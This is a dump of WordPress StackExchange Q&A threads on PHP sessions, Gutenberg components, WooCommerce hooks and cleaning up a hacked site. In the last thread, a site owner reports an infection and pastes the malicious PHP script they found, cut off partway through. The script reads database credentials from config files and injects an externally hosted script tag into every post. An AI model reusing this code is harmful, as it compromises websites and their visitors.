"text": "<p>In my case this was caused by the plugin "Contact Form by BestWebSoft".</p>\n<p>If you find yourself in the same situation you have to disable the plugin one by one and refresh the page <code>/wp-admin/site-health.php</code> to check if the error is still there.</p>\n<p>As explained here <a href=\"https://stackoverflow.com/questions/64377032/getting-an-active-php-session-was-detected-critical-warning-in-wordpress\">https://stackoverflow.com/questions/64377032/getting-an-active-php-session-was-detected-critical-warning-in-wordpress</a> this is due to a plugin badly developed.</p>\n"
},
{
"answer_id": 382401,
"author": "shiv",
"author_id": 136088,
"author_profile": "https://wordpress.stackexchange.com/users/136088",
"pm_score": 1,
"selected": false,
"text": "<p>I was facing same issue.</p>\n<p>I replaced the code</p>\n<pre><code>session_start();\n</code></pre>\n<p>with</p>\n<pre><code>if (!isset($_SESSION)) {\n session_start(['read_and_close' => true]);\n}\n</code></pre>\n<p>and it worked for me.</p>\n"
},
{
"answer_id": 385016,
"author": "Steve Humphrey",
"author_id": 203288,
"author_profile": "https://wordpress.stackexchange.com/users/203288",
"pm_score": 0,
"selected": false,
"text": "<p>I've found that WP e-Store causes:</p>\n<ol>\n<li>An active PHP session was detected</li>\n<li>the REST API encountered an error</li>\n</ol>\n<p>WP SpamShield causes:</p>\n<ol>\n<li>An active PHP session was detected</li>\n</ol>\n<p>I'll look at the code and see if I can find a way to fix it in these plugins. Without e-Store, the site is basically dead in the water!</p>\n<p>If anyone had found and fixed either of these plugins, I'd love to know what worked.</p>\n<p>[email protected]</p>\n"
},
{
"answer_id": 392462,
"author": "Lee",
"author_id": 47505,
"author_profile": "https://wordpress.stackexchange.com/users/47505",
"pm_score": 0,
"selected": false,
"text": "<p>I had exactly this same issue. After many attempts at hooking to call <code>session_start()</code> elsewhere within the Wordpress loading process, a colleague suggested I try replacing my code in functions.php with the following:</p>\n<pre><code>if(session_status() == PHP_SESSION_NONE) {\n session_start();\n}\n</code></pre>\n<p>This seemed to fix both issues I was having, clear the error in Wordpress, and allow my front end users to log into the system I had created.</p>\n"
},
{
"answer_id": 412259,
"author": "MiB",
"author_id": 72701,
"author_profile": "https://wordpress.stackexchange.com/users/72701",
"pm_score": 0,
"selected": false,
"text": "<p>Thanks to @Lee's answer and @shiv's link to the <a href=\"https://www.php.net/manual/en/function.session-start.php#example-4810\" rel=\"nofollow noreferrer\">PHP documentation for session_start</a>, I came up with this that solved my issues. Could possibly work in the case of the OP as well.</p>\n<pre><code>if (session_status() == PHP_SESSION_NONE) {\n session_start([\n 'cookie_lifetime' => 86400,\n 'read_and_close' => true,\n ]);\n}\n</code></pre>\n<p>One can note this was with the issue persisting also with all plug-ins inactivated.</p>\n"
}
] | 2020/11/01 | [
"https://wordpress.stackexchange.com/questions/377483",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/196921/"
] | I'm new in WordPress development and I just created my first theme.
In my wp-admin, the `"Site Health"` tells me that a PHP session has been detected (critical error), here is the message :
>
> A PHP session was created by a session\_start() function call. This
> interferes with REST API and loopback requests. The session should be
> closed by session\_write\_close() before making any HTTP requests.
>
>
>
I need PHP's `$_SESSION` for a theme script, and I added this to my functions.php file for sessions to be properly initialized:
```
<?php
if (!session_id()) {
session_start();
}
```
If I delete these lines, the message disappears, but my PHP sessions don’t work anymore.
If I keep these lines, everything seems to be working properly but this message is worrying...
Does anyone have an idea to solve this problem while keeping the ability to use the `$_SESSION`?
My WP version is `5.5.3` and the PHP version is `7.4.8`.
Thank you in advance for your help! | I was facing same issue.
I replaced the code
```
session_start();
```
with
```
if (!isset($_SESSION)) {
session_start(['read_and_close' => true]);
}
```
and it worked for me. |
377,597 | <p>I'm trying to diagnose a similar problem to <a href="https://wordpress.stackexchange.com/questions/320483/uncaught-typeerror-wp-apifetch-is-not-a-function">this question</a>, but in that case he wasn't depending on <code>wp-api-fetch</code>, and ... I'm pretty sure I am.</p>
<p>I'm getting the following error:</p>
<pre><code>[Error] Unhandled Promise Rejection: TypeError: Object is not a function. (In 'Object(_wordpress_api_fetch__WEBPACK_IMPORTED_MODULE_5__["apiFetch"])', 'Object' is an instance of Object)
</code></pre>
<p>(full backtrace, below)</p>
<p>I should note that I'm new to both the REST API and ESNext/Gutenberg plugin development, so ... I may be missing something really obvious, like a comma :)</p>
<p>Here's the code:</p>
<pre><code>import { __ } from '@wordpress/i18n';
import { Fragment } from '@wordpress/element';
import { TextControl } from '@wordpress/components';
import { apiFetch } from '@wordpress/api-fetch';
export default function Edit( props ) {
const {
attributes: { cwraggDataSourceType, cwraggDataSource,
cwraggLocalFile },
setAttributes,
} = props;
const post_id = wp.data.select("core/editor").getCurrentPostId();
const onChangeContent = async ( newUrl ) => {
let localFileName = await apiFetch( {
path: '/cwraggb/v1/setremotedatasrc',
method: 'POST',
data: { 'url': newUrl,
'type': 'json',
'postId': post_id } } );
...
};
...
}
</code></pre>
<p>I looked at the output of <code>npm run start</code>, and it seems to be including the dependencies in the build:</p>
<p><code><?php return array('dependencies' => array('wp-api-fetch', 'wp-blocks', 'wp-components', 'wp-element', 'wp-i18n', 'wp-polyfill'), 'version' => '566e4b7cb2f100542103b2b0e25aefae');</code></p>
<p>This is being built, and docker run, on MacOS 10.15.7.</p>
<pre><code>~ % npm --version
6.14.8
~ % wp-env --version
2.1.0
</code></pre>
<p>Any ideas what's causing that error, and/or how I can further diagnose?</p>
<p>Full error message:</p>
<pre><code>[Error] Unhandled Promise Rejection: TypeError: Object is not a function. (In 'Object(_wordpress_api_fetch__WEBPACK_IMPORTED_MODULE_5__["apiFetch"])', 'Object' is an instance of Object)
dispatchException (wp-polyfill.js:7017)
invoke (wp-polyfill.js:6738)
asyncGeneratorStep (cwra-google-graph-block-admin.js:250)
_next (cwra-google-graph-block-admin.js:272)
(anonymous function) (cwra-google-graph-block-admin.js:279)
Promise
(anonymous function) (cwra-google-graph-block-admin.js:268)
callCallback (react-dom.js:341)
dispatchEvent
invokeGuardedCallbackDev (react-dom.js:391)
invokeGuardedCallback (react-dom.js:448)
invokeGuardedCallbackAndCatchFirstError (react-dom.js:462)
executeDispatch (react-dom.js:594)
executeDispatchesInOrder (react-dom.js:616)
executeDispatchesAndRelease (react-dom.js:719)
forEach
forEachAccumulated (react-dom.js:699)
runEventsInBatch (react-dom.js:744)
runExtractedPluginEventsInBatch (react-dom.js:875)
handleTopLevel (react-dom.js:6026)
dispatchEventForPluginEventSystem (react-dom.js:6121)
dispatchEvent (react-dom.js:6150)
dispatchEvent
unstable_runWithPriority (react.js:2820)
discreteUpdates$1 (react-dom.js:21810)
discreteUpdates (react-dom.js:2357)
dispatchDiscreteEvent (react-dom.js:6104)
dispatchDiscreteEvent
</code></pre>
| [
{
"answer_id": 380509,
"author": "Francesco Mantovani",
"author_id": 157101,
"author_profile": "https://wordpress.stackexchange.com/users/157101",
"pm_score": 0,
"selected": false,
"text": "<p>In my case this was caused by the plugin "Contact Form by BestWebSoft".</p>\n<p>If you find yourself in the same situation you have to disable the plugin one by one and refresh the page <code>/wp-admin/site-health.php</code> to check if the error is still there.</p>\n<p>As explained here <a href=\"https://stackoverflow.com/questions/64377032/getting-an-active-php-session-was-detected-critical-warning-in-wordpress\">https://stackoverflow.com/questions/64377032/getting-an-active-php-session-was-detected-critical-warning-in-wordpress</a> this is due to a plugin badly developed.</p>\n"
},
{
"answer_id": 382401,
"author": "shiv",
"author_id": 136088,
"author_profile": "https://wordpress.stackexchange.com/users/136088",
"pm_score": 1,
"selected": false,
"text": "<p>I was facing same issue.</p>\n<p>I replaced the code</p>\n<pre><code>session_start();\n</code></pre>\n<p>with</p>\n<pre><code>if (!isset($_SESSION)) {\n session_start(['read_and_close' => true]);\n}\n</code></pre>\n<p>and it worked for me.</p>\n"
},
{
"answer_id": 385016,
"author": "Steve Humphrey",
"author_id": 203288,
"author_profile": "https://wordpress.stackexchange.com/users/203288",
"pm_score": 0,
"selected": false,
"text": "<p>I've found that WP e-Store causes:</p>\n<ol>\n<li>An active PHP session was detected</li>\n<li>the REST API encountered an error</li>\n</ol>\n<p>WP SpamShield causes:</p>\n<ol>\n<li>An active PHP session was detected</li>\n</ol>\n<p>I'll look at the code and see if I can find a way to fix it in these plugins. Without e-Store, the site is basically dead in the water!</p>\n<p>If anyone had found and fixed either of these plugins, I'd love to know what worked.</p>\n<p>[email protected]</p>\n"
},
{
"answer_id": 392462,
"author": "Lee",
"author_id": 47505,
"author_profile": "https://wordpress.stackexchange.com/users/47505",
"pm_score": 0,
"selected": false,
"text": "<p>I had exactly this same issue. After many attempts at hooking to call <code>session_start()</code> elsewhere within the Wordpress loading process, a colleague suggested I try replacing my code in functions.php with the following:</p>\n<pre><code>if(session_status() == PHP_SESSION_NONE) {\n session_start();\n}\n</code></pre>\n<p>This seemed to fix both issues I was having, clear the error in Wordpress, and allow my front end users to log into the system I had created.</p>\n"
},
{
"answer_id": 412259,
"author": "MiB",
"author_id": 72701,
"author_profile": "https://wordpress.stackexchange.com/users/72701",
"pm_score": 0,
"selected": false,
"text": "<p>Thanks to @Lee's answer and @shiv's link to the <a href=\"https://www.php.net/manual/en/function.session-start.php#example-4810\" rel=\"nofollow noreferrer\">PHP documentation for session_start</a>, I came up with this that solved my issues. Could possibly work in the case of the OP as well.</p>\n<pre><code>if (session_status() == PHP_SESSION_NONE) {\n session_start([\n 'cookie_lifetime' => 86400,\n 'read_and_close' => true,\n ]);\n}\n</code></pre>\n<p>One can note this was with the issue persisting also with all plug-ins inactivated.</p>\n"
}
] | 2020/11/03 | [
"https://wordpress.stackexchange.com/questions/377597",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/194028/"
] | I'm trying to diagnose a similar problem to [this question](https://wordpress.stackexchange.com/questions/320483/uncaught-typeerror-wp-apifetch-is-not-a-function), but in that case he wasn't depending on `wp-api-fetch`, and ... I'm pretty sure I am.
I'm getting the following error:
```
[Error] Unhandled Promise Rejection: TypeError: Object is not a function. (In 'Object(_wordpress_api_fetch__WEBPACK_IMPORTED_MODULE_5__["apiFetch"])', 'Object' is an instance of Object)
```
(full backtrace, below)
I should note that I'm new to both the REST API and ESNext/Gutenberg plugin development, so ... I may be missing something really obvious, like a comma :)
Here's the code:
```
import { __ } from '@wordpress/i18n';
import { Fragment } from '@wordpress/element';
import { TextControl } from '@wordpress/components';
import { apiFetch } from '@wordpress/api-fetch';
export default function Edit( props ) {
const {
attributes: { cwraggDataSourceType, cwraggDataSource,
cwraggLocalFile },
setAttributes,
} = props;
const post_id = wp.data.select("core/editor").getCurrentPostId();
const onChangeContent = async ( newUrl ) => {
let localFileName = await apiFetch( {
path: '/cwraggb/v1/setremotedatasrc',
method: 'POST',
data: { 'url': newUrl,
'type': 'json',
'postId': post_id } } );
...
};
...
}
```
I looked at the output of `npm run start`, and it seems to be including the dependencies in the build:
`<?php return array('dependencies' => array('wp-api-fetch', 'wp-blocks', 'wp-components', 'wp-element', 'wp-i18n', 'wp-polyfill'), 'version' => '566e4b7cb2f100542103b2b0e25aefae');`
This is being built, and docker run, on MacOS 10.15.7.
```
~ % npm --version
6.14.8
~ % wp-env --version
2.1.0
```
Any ideas what's causing that error, and/or how I can further diagnose?
Full error message:
```
[Error] Unhandled Promise Rejection: TypeError: Object is not a function. (In 'Object(_wordpress_api_fetch__WEBPACK_IMPORTED_MODULE_5__["apiFetch"])', 'Object' is an instance of Object)
dispatchException (wp-polyfill.js:7017)
invoke (wp-polyfill.js:6738)
asyncGeneratorStep (cwra-google-graph-block-admin.js:250)
_next (cwra-google-graph-block-admin.js:272)
(anonymous function) (cwra-google-graph-block-admin.js:279)
Promise
(anonymous function) (cwra-google-graph-block-admin.js:268)
callCallback (react-dom.js:341)
dispatchEvent
invokeGuardedCallbackDev (react-dom.js:391)
invokeGuardedCallback (react-dom.js:448)
invokeGuardedCallbackAndCatchFirstError (react-dom.js:462)
executeDispatch (react-dom.js:594)
executeDispatchesInOrder (react-dom.js:616)
executeDispatchesAndRelease (react-dom.js:719)
forEach
forEachAccumulated (react-dom.js:699)
runEventsInBatch (react-dom.js:744)
runExtractedPluginEventsInBatch (react-dom.js:875)
handleTopLevel (react-dom.js:6026)
dispatchEventForPluginEventSystem (react-dom.js:6121)
dispatchEvent (react-dom.js:6150)
dispatchEvent
unstable_runWithPriority (react.js:2820)
discreteUpdates$1 (react-dom.js:21810)
discreteUpdates (react-dom.js:2357)
dispatchDiscreteEvent (react-dom.js:6104)
dispatchDiscreteEvent
``` | I was facing same issue.
I replaced the code
```
session_start();
```
with
```
if (!isset($_SESSION)) {
session_start(['read_and_close' => true]);
}
```
and it worked for me. |
377,614 | <p>I can't find any useful information in Gutenberg Handbook. <a href="https://developer.wordpress.org/block-editor/developers/themes/theme-support/#block-gradient-presets" rel="nofollow noreferrer">Here</a> is information about adding gradients, but it only works for some core blocks.</p>
<p>I use <code>ColorPalette</code> to create colors (or to use the color picker) but still don't know how to use gradients. I also found <code>PanelColorSettings</code> but still without success.</p>
<p>I am looking for instructions/documentation on how to add this component:</p>
<p><a href="https://i.stack.imgur.com/FTos8.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/FTos8.png" alt="enter image description here" /></a></p>
| [
{
"answer_id": 377619,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 3,
"selected": true,
"text": "<p><strong>The documentation for that control does not exist at this time. Instructions have not been written yet. It is an experimental component.</strong></p>\n<hr />\n<p>You need to use an appropriate control in your blocks Edit component.</p>\n<p>Note that these are very new components, their design will likely change, <em>it should be considered experimental and unstable</em>.</p>\n<p>There is the <code>GradientPicker</code> component, <a href=\"https://github.com/WordPress/gutenberg/blob/master/packages/components/src/gradient-picker/index.js\" rel=\"nofollow noreferrer\">https://github.com/WordPress/gutenberg/blob/master/packages/components/src/gradient-picker/index.js</a></p>\n<p>And <code>ColorGradientControl</code> <a href=\"https://github.com/WordPress/gutenberg/blob/26e4d59e6fd3ed78d0213d60abca31c6dc1fa9cb/packages/block-editor/src/components/colors-gradients/control.js\" rel=\"nofollow noreferrer\">https://github.com/WordPress/gutenberg/blob/26e4d59e6fd3ed78d0213d60abca31c6dc1fa9cb/packages/block-editor/src/components/colors-gradients/control.js</a></p>\n<pre><code> <ColorGradientControl\n { ...otherProps }\n onColorChange={ onChange }\n colorValue={ value }\n gradients={ [] }\n disableCustomGradients={ true }\n />\n</code></pre>\n"
},
{
"answer_id": 386755,
"author": "Jean-Philippe Belley",
"author_id": 205029,
"author_profile": "https://wordpress.stackexchange.com/users/205029",
"pm_score": 1,
"selected": false,
"text": "<p>I found support for custom block, it really helps.</p>\n<pre><code>supports: {\n color: {\n // This also enables text and background UI controls.\n gradients: true; // Enable gradients UI control.\n }\n}\n</code></pre>\n<p><a href=\"https://developer.wordpress.org/block-editor/reference-guides/block-api/block-supports/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/block-editor/reference-guides/block-api/block-supports/</a></p>\n"
}
] | 2020/11/03 | [
"https://wordpress.stackexchange.com/questions/377614",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/133615/"
] | I can't find any useful information in Gutenberg Handbook. [Here](https://developer.wordpress.org/block-editor/developers/themes/theme-support/#block-gradient-presets) is information about adding gradients, but it only works for some core blocks.
I use `ColorPalette` to create colors (or to use the color picker) but still don't know how to use gradients. I also found `PanelColorSettings` but still without success.
I am looking for instructions/documentation on how to add this component:
[](https://i.stack.imgur.com/FTos8.png) | **The documentation for that control does not exist at this time. Instructions have not been written yet. It is an experimental component.**
---
You need to use an appropriate control in your blocks Edit component.
Note that these are very new components, their design will likely change, *it should be considered experimental and unstable*.
There is the `GradientPicker` component, <https://github.com/WordPress/gutenberg/blob/master/packages/components/src/gradient-picker/index.js>
And `ColorGradientControl` <https://github.com/WordPress/gutenberg/blob/26e4d59e6fd3ed78d0213d60abca31c6dc1fa9cb/packages/block-editor/src/components/colors-gradients/control.js>
```
<ColorGradientControl
{ ...otherProps }
onColorChange={ onChange }
colorValue={ value }
gradients={ [] }
disableCustomGradients={ true }
/>
``` |
377,620 | <p>I running an instance of Wordpress on my web server but I'm getting this error in the logs</p>
<pre><code>PHP Warning: chmod(): Operation not permitted in
/home/webserver/html/wp-admin/includes/class-wp-filesystem-direct.php on line 173,
referer: http:// mysite.com/
</code></pre>
<p>I check the <code>class-wp-filesystem-direct.php</code> file on 173</p>
<p>here is the line:</p>
<pre><code>if ( ! $recursive || ! $this->is_dir( $file ) ) {
return chmod( $file, $mode );
}
</code></pre>
<p>This are the permissions of this file:</p>
<pre><code>-rwxrwxr-x 1 root apache 17K Oct 20 20:24 /home/webserver/html/wp-admin/includes/class-wp-filesystem-direct.php
</code></pre>
<p>Any of you knows what is wrong with my instance of Wordpress?</p>
<p>I'll really appreciated your help.</p>
| [
{
"answer_id": 377619,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 3,
"selected": true,
"text": "<p><strong>The documentation for that control does not exist at this time. Instructions have not been written yet. It is an experimental component.</strong></p>\n<hr />\n<p>You need to use an appropriate control in your blocks Edit component.</p>\n<p>Note that these are very new components, their design will likely change, <em>it should be considered experimental and unstable</em>.</p>\n<p>There is the <code>GradientPicker</code> component, <a href=\"https://github.com/WordPress/gutenberg/blob/master/packages/components/src/gradient-picker/index.js\" rel=\"nofollow noreferrer\">https://github.com/WordPress/gutenberg/blob/master/packages/components/src/gradient-picker/index.js</a></p>\n<p>And <code>ColorGradientControl</code> <a href=\"https://github.com/WordPress/gutenberg/blob/26e4d59e6fd3ed78d0213d60abca31c6dc1fa9cb/packages/block-editor/src/components/colors-gradients/control.js\" rel=\"nofollow noreferrer\">https://github.com/WordPress/gutenberg/blob/26e4d59e6fd3ed78d0213d60abca31c6dc1fa9cb/packages/block-editor/src/components/colors-gradients/control.js</a></p>\n<pre><code> <ColorGradientControl\n { ...otherProps }\n onColorChange={ onChange }\n colorValue={ value }\n gradients={ [] }\n disableCustomGradients={ true }\n />\n</code></pre>\n"
},
{
"answer_id": 386755,
"author": "Jean-Philippe Belley",
"author_id": 205029,
"author_profile": "https://wordpress.stackexchange.com/users/205029",
"pm_score": 1,
"selected": false,
"text": "<p>I found support for custom block, it really helps.</p>\n<pre><code>supports: {\n color: {\n // This also enables text and background UI controls.\n gradients: true; // Enable gradients UI control.\n }\n}\n</code></pre>\n<p><a href=\"https://developer.wordpress.org/block-editor/reference-guides/block-api/block-supports/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/block-editor/reference-guides/block-api/block-supports/</a></p>\n"
}
] | 2020/11/03 | [
"https://wordpress.stackexchange.com/questions/377620",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/197023/"
] | I running an instance of Wordpress on my web server but I'm getting this error in the logs
```
PHP Warning: chmod(): Operation not permitted in
/home/webserver/html/wp-admin/includes/class-wp-filesystem-direct.php on line 173,
referer: http:// mysite.com/
```
I check the `class-wp-filesystem-direct.php` file on 173
here is the line:
```
if ( ! $recursive || ! $this->is_dir( $file ) ) {
return chmod( $file, $mode );
}
```
This are the permissions of this file:
```
-rwxrwxr-x 1 root apache 17K Oct 20 20:24 /home/webserver/html/wp-admin/includes/class-wp-filesystem-direct.php
```
Any of you knows what is wrong with my instance of Wordpress?
I'll really appreciated your help. | **The documentation for that control does not exist at this time. Instructions have not been written yet. It is an experimental component.**
---
You need to use an appropriate control in your blocks Edit component.
Note that these are very new components, their design will likely change, *it should be considered experimental and unstable*.
There is the `GradientPicker` component, <https://github.com/WordPress/gutenberg/blob/master/packages/components/src/gradient-picker/index.js>
And `ColorGradientControl` <https://github.com/WordPress/gutenberg/blob/26e4d59e6fd3ed78d0213d60abca31c6dc1fa9cb/packages/block-editor/src/components/colors-gradients/control.js>
```
<ColorGradientControl
{ ...otherProps }
onColorChange={ onChange }
colorValue={ value }
gradients={ [] }
disableCustomGradients={ true }
/>
``` |
377,712 | <p>In WooCommerce I create orders and users by code and on the 'order-pay' endpoint a user is created by form + ajax. The 'proceed to checkout' button is disabled by jQuery until the user is created. Now I want to create a server side check. So trying to run a function after submit but before the redirect to the payment gateway.</p>
<p>I've tried these hooks but they all don't work for me in this case (do nothing).</p>
<pre><code>add_action( 'woocommerce_before_checkout_process', 'is_user_created' , 1, 1 );
add_action( 'woocommerce_new_order', 'is_user_created' , 1, 1 );
add_action( 'woocommerce_checkout_process', 'is_user_created' , 1, 1 );
add_action( 'woocommerce_checkout_order_processed', 'is_user_created' , 1, 1 );
add_action( 'woocommerce_check_cart_items', 'is_user_created' , 1, 1 );
add_action( 'woocommerce_review_order_after_submit', 'is_user_created' , 1, 1 );
</code></pre>
<p>The function used to test is:</p>
<pre><code>function is_user_created( $order_id ){
die ('No account created');
}
</code></pre>
<p>Any ideas?</p>
| [
{
"answer_id": 377728,
"author": "Peps",
"author_id": 188144,
"author_profile": "https://wordpress.stackexchange.com/users/188144",
"pm_score": 3,
"selected": true,
"text": "<p>Why is it so hard to find a list of woocommerce hooks per page or sequence of execution or order > payment flow?</p>\n<p>Anyway, after hours and hours of searching:</p>\n<pre><code>add_action( 'woocommerce_before_pay_action', 'Your Function', 1, 1 );\n</code></pre>\n"
},
{
"answer_id": 396674,
"author": "Moiz",
"author_id": 213418,
"author_profile": "https://wordpress.stackexchange.com/users/213418",
"pm_score": 0,
"selected": false,
"text": "<p>This worked for me</p>\n<pre><code>add_action( 'woocommerce_before_checkout_process', 'fireBeforeCheckout', 10, 1 );\n</code></pre>\n"
},
{
"answer_id": 399286,
"author": "mahdi mortezaeei",
"author_id": 215907,
"author_profile": "https://wordpress.stackexchange.com/users/215907",
"pm_score": 0,
"selected": false,
"text": "<p>This is the best hook that u can use, this hook launch after last checkout process before redirect user to payment gateway (paying)</p>\n<p><code>add_action( 'woocommerce_checkout_order_processed', 'callback_function' );</code></p>\n"
}
] | 2020/11/05 | [
"https://wordpress.stackexchange.com/questions/377712",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/188144/"
] | In WooCommerce I create orders and users by code and on the 'order-pay' endpoint a user is created by form + ajax. The 'proceed to checkout' button is disabled by jQuery until the user is created. Now I want to create a server side check. So trying to run a function after submit but before the redirect to the payment gateway.
I've tried these hooks but they all don't work for me in this case (do nothing).
```
add_action( 'woocommerce_before_checkout_process', 'is_user_created' , 1, 1 );
add_action( 'woocommerce_new_order', 'is_user_created' , 1, 1 );
add_action( 'woocommerce_checkout_process', 'is_user_created' , 1, 1 );
add_action( 'woocommerce_checkout_order_processed', 'is_user_created' , 1, 1 );
add_action( 'woocommerce_check_cart_items', 'is_user_created' , 1, 1 );
add_action( 'woocommerce_review_order_after_submit', 'is_user_created' , 1, 1 );
```
The function used to test is:
```
function is_user_created( $order_id ){
die ('No account created');
}
```
Any ideas? | Why is it so hard to find a list of woocommerce hooks per page or sequence of execution or order > payment flow?
Anyway, after hours and hours of searching:
```
add_action( 'woocommerce_before_pay_action', 'Your Function', 1, 1 );
``` |
377,752 | <p>My Wordpress site has been hacked and every post has had</p>
<p><code><script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script></code></p>
<p>added to the end of each post which I need to remove. I have 375 posts I need this removing from I have tried</p>
<p><code>UPDATE wp_posts SET post_content = REPLACE (post_content, '<p style="text-align: center;"><img src="http://i.imgur.com/picture.jpg" alt="" /></p>', '');</code></p>
<p>from the <a href="https://wordpress.stackexchange.com/questions/188384/how-to-mass-delete-one-line-from-all-posts">How to mass delete one line from all posts</a></p>
<p>and substituted it with the following query I'm thinking it has something to do with the ' in the query</p>
<p><code>UPDATE wp_posts SET post_content = REPLACE (post_content, '<script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>', '');</code></p>
<p>but I get the following error</p>
<p><code>#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>'' at line 1</code></p>
<p>when I run the query I think it has something to do with the <code>'</code> inside the script tags but I don't know how to remove them.</p>
| [
{
"answer_id": 377775,
"author": "uPrompt",
"author_id": 155077,
"author_profile": "https://wordpress.stackexchange.com/users/155077",
"pm_score": 4,
"selected": true,
"text": "<p>Try this:</p>\n<pre><code>UPDATE wp_posts SET post_content = REPLACE (post_content, "<script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>","");\n</code></pre>\n"
},
{
"answer_id": 377781,
"author": "Rick Hellewell",
"author_id": 29416,
"author_profile": "https://wordpress.stackexchange.com/users/29416",
"pm_score": 0,
"selected": false,
"text": "<p>Your original code had single quotes inside a single quote. Which is why @uprompt 's code worked. .... he uses a double quote to surround the text to search for in the command.</p>\n"
},
{
"answer_id": 377953,
"author": "TheRealThor",
"author_id": 197334,
"author_profile": "https://wordpress.stackexchange.com/users/197334",
"pm_score": 0,
"selected": false,
"text": "<p>I was hacked with the same script, just the URL is different.</p>\n<pre><code><script src="https://drake.strongcapitalads.ga/m.js?n=ns1" type="text/javascript2></script> \n</code></pre>\n<p>Seems this group has various server under their control. I already sent out abuse emails.</p>\n<p>Don't forget that the malware was also added to all your *.js files and other files. Here is the malicious script that was uploaded to my server making those chances to the posts and other files:</p>\n<pre><code><?php echo "ssqqss>>>";\nerror_reporting(0);\nini_set('display_errors',0);\nini_set('max_execution_time', '300');\nini_set('memory_limit', '-1');\n$count = 0;\n\nsearch_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");\necho "\\r\\n\njssss count:: ". $count;\necho "<<<<ssqqss";\n\n \nfunction get_var_reg($pat,$text) {\n \n if ($c = preg_match_all ("/".$pat."/is", $text, $matches))\n {\n return $matches[1][0];\n }\n \n return "";\n}\nfunction search_file_ms($dir,$file_to_search){\n\n$search_array = array();\n\n$files = scandir($dir);\n\nif($files == false) {\n \n $dir = substr($dir, 0, -3);\n if (strpos($dir, '../') !== false) {\n \n @search_file_ms( $dir,$file_to_search);\n return;\n }\n if($dir == $_SERVER['DOCUMENT_ROOT']."/") {\n \n @search_file_ms( $dir,$file_to_search);\n return;\n }\n}\n\nforeach($files as $key => $value){\n\n\n $path = realpath($dir.DIRECTORY_SEPARATOR.$value);\n\n if(!is_dir($path)) {\n if (strpos($value,$file_to_search) !== false) {\n \n show_sitenames($path);\n \n \n \n }\n\n } else if($value != "." && $value != "..") {\n\n @search_file_ms($path, $file_to_search);\n\n } \n } \n}\nfunction show_sitenames($file){\n $content = @file_get_contents($file);\n if(strpos($content, "DB_NAME") !== false) {\n \n \n $db = get_var_reg("'DB_NAME'.*?,.*?['|\\"](.*?)['|\\"]",$content);\n $host = get_var_reg("'DB_HOST'.*?,.*?['|\\"](.*?)['|\\"]",$content);\n $user = get_var_reg("'DB_USER'.*?,.*?['|\\"](.*?)['|\\"]",$content);\n $pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\\"](.*?)['|\\"]",$content);\n\n\n// Create connection\n$conn = new mysqli($host, $user, $pass);\n\n// Check connection\nif ($conn->connect_error) {\n \n} else { \n\n\n$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";\n$result = $conn->query($q);\nif ($result->num_rows > 0) {\n while($row = $result->fetch_assoc()) {\n $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 ";\n $result2 = $conn->query($q2);\n if ($result2->num_rows > 0) {\n while($row2 = $result2->fetch_assoc()) {\n $val = $row2['post_content'];\n if(strpos($val, "drake.strongcapitalads.ga") === false){\n if(strpos($val, "drake.strongcapitalads.ga") === false){\n \n \n $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\\"<script src='https://drake.strongcapitalads.ga/m.js?n=ns1' type='text/javascript'></script>\\") WHERE post_content NOT LIKE '%drake.strongcapitalads.ga%'";\n $conn->query($q3);\n echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];\n \n } else {\n \n }\n\n } \n }\n } else {\n }\n }\n} else {\n}\n$conn->close();\n}\n}\n}\n\nfunction search_file($dir,$file_to_search){\n\n$files = @scandir($dir);\n\nif($files == false) {\n \n $dir = substr($dir, 0, -3);\n if (strpos($dir, '../') !== false) {\n \n @search_file( $dir,$file_to_search);\n return;\n }\n if($dir == $_SERVER['DOCUMENT_ROOT']."/") {\n \n @search_file( $dir,$file_to_search);\n return;\n }\n}\n\nforeach($files as $key => $value){\n\n $path = realpath($dir.DIRECTORY_SEPARATOR.$value);\n \n if(!is_dir($path)) {\n if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {\n\n make_it($path);\n\n } }else if($value != "." && $value != "..") {\n\n search_file($path, $file_to_search);\n\n } \n } \n\n}\n\nfunction search_file_index($dir,$file_to_search){\n\n$files = @scandir($dir);\n\nif($files == false) {\n \n $dir = substr($dir, 0, -3);\n if (strpos($dir, '../') !== false) {\n \n search_file_index( $dir,$file_to_search);\n return;\n }\n if($dir == $_SERVER['DOCUMENT_ROOT']."/") {\n \n search_file_index( $dir,$file_to_search);\n return;\n }\n}\n\nforeach($files as $key => $value){\n\n $path = realpath($dir.DIRECTORY_SEPARATOR.$value);\n \n if(!is_dir($path)) {\n if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {\n\n make_it_index($path);\n\n } }else if($value != "." && $value != "..") {\n\n search_file_index($path, $file_to_search);\n\n } \n } \n\n}\nfunction search_file_js($dir,$file_to_search){\n\n$files = @scandir($dir);\nif($files == false) {\n \n $dir = substr($dir, 0, -3);\n if (strpos($dir, '../') !== false) {\n \n @search_file_js( 